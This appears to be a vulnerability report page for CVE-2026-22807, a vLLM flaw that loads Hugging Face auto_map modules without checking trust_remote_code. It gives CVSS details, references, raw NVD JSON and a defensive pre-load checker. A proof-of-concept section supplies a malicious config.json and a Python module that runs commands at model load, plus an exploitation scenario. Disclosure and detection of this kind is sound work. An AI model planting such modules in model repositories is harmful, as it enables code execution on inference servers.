Security Vulnerability Report
CVE-2026-22807 CVSS 8.8 HIGH

CVE-2026-22807

Published: 2026-01-21 22:15:49
Last Modified: 2026-01-30 14:43:22

Description

vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM 0.10.1 <= version < 0.14.0
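
A pre-load check an operator could run before pointing the server at a model directory, added here as an illustration and not taken from vLLM or from the advisory. The function names (`find_auto_map`, `preload_check`) and the sample config are constructed; only the version range and the `auto_map` / `trust_remote_code` names come from the description above.

```python
import json
import re
import tempfile
from pathlib import Path

AFFECTED_START, FIXED_IN = (0, 10, 1), (0, 14, 0)  # range stated in the advisory

def parse_version(text):
    """'0.13.0' or '0.11.0.post1' -> (0, 13, 0); suffixes are ignored (assumption)."""
    nums = [int(m.group()) for m in (re.match(r"\d+", p) for p in text.split(".")[:3]) if m]
    return tuple(nums + [0] * (3 - len(nums)))

def is_affected(version_text):
    return AFFECTED_START <= parse_version(version_text) < FIXED_IN

def find_auto_map(model_dir):
    """List (file, auto_class, 'module.Class') for auto_map entries in top-level JSON configs."""
    findings = []
    for path in sorted(Path(model_dir).glob("*.json")):
        try:
            data = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed file: nothing to report from it
        auto_map = data.get("auto_map") if isinstance(data, dict) else None
        if not isinstance(auto_map, dict):
            continue
        for auto_class, ref in auto_map.items():
            # A value is one "module.Class" string or a list of them (entries may be null).
            for item in ref if isinstance(ref, list) else [ref]:
                if isinstance(item, str):
                    findings.append((path.name, auto_class, item))
    return findings

def preload_check(model_dir, vllm_version, trust_remote_code):
    """Return ('block' | 'allow', findings) before handing model_dir to the server."""
    findings = find_auto_map(model_dir)
    # On affected versions the flag does not gate auto_map loading, so a directory that
    # requests dynamic modules is rejected unless the operator opted in on purpose.
    if findings and is_affected(vllm_version) and not trust_remote_code:
        return "block", findings
    return "allow", findings

def demo():
    """Run the check against a constructed model directory (sample data, not a real repo)."""
    with tempfile.TemporaryDirectory() as d:
        cfg = {"model_type": "custom_model",
               "auto_map": {"AutoConfig": "custom_cfg.CustomConfig",
                            "AutoTokenizer": ["custom_tok.CustomTokenizer", None]}}
        Path(d, "config.json").write_text(json.dumps(cfg), encoding="utf-8")
        return [preload_check(d, v, False)[0] for v in ("0.10.0", "0.13.0", "0.14.0")], find_auto_map(d)
```

In a deployment the version argument can come from `importlib.metadata.version("vllm")`; the findings list is worth logging even when the decision is `allow`.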

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Malicious model config.json for CVE-2026-22807 PoC
# Place this config.json in a Hugging Face model repo or local directory
{
    "model_type": "custom_model",
    "auto_map": {
        "AutoConfig": ["malicious_module.MaliciousConfig", "None"]
    },
    "trust_remote_code": true
}

# malicious_module.py - Malicious code to be placed alongside config.json
'''
import os
import subprocess

class MaliciousConfig:
    def __init__(self, *args, **kwargs):
        # Arbitrary code execution during model loading
        # Example: Create a backdoor or exfiltrate data
        try:
            with open('/tmp/vllm_pwned.txt', 'w') as f:
                f.write('CVE-2026-22807 exploited successfully')
            # Execute system commands as vLLM user
            subprocess.run(['id'], capture_output=True)
        except Exception as e:
            pass
        super().__init__(*args, **kwargs)
'''

# Exploitation scenario:
# 1. Attacker creates a malicious model repo on Hugging Face Hub
# 2. Victim runs: vllm serve attacker/model --trust-remote-code
# 3. Or victim loads model from a path controlled by attacker
# 4. Code executes during model loading, before any API request
```

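References

https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5 (Patch)
https://github.com/vllm-project/vllm/pull/32194 (Issue Tracking, Patch)
https://github.com/vllm-project/vllm/releases/tag/v0.14.0 (Product, Release Notes)
https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr (Patch, Vendor Advisory)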

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22807", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.077", "lastModified": "2026-01-30T14:43:22.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue."}, {"lang": "es", "value": "vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLM). A partir de la versión 0.10.1 y antes de la versión 0.14.0, vLLM carga módulos dinámicos 'auto_map' de Hugging Face durante la resolución del modelo sin depender de 'trust_remote_code', permitiendo que código Python controlado por el atacante en un repositorio/ruta de modelo se ejecute al inicio del servidor. Un atacante que pueda influir en el repositorio/ruta del modelo (directorio local o repositorio remoto de Hugging Face) puede lograr la ejecución de código arbitrario en el host de vLLM durante la carga del modelo. Esto ocurre antes de cualquier manejo de solicitudes y no requiere acceso a la API. 
La versión 0.14.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.1", "versionEndExcluding": "0.14.0", "matchCriteriaId": "F2E87BA6-DDF8-4FF6-A286-B44780082C69"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/32194", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/vllm-project/vllm/releases/tag/v0.14.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}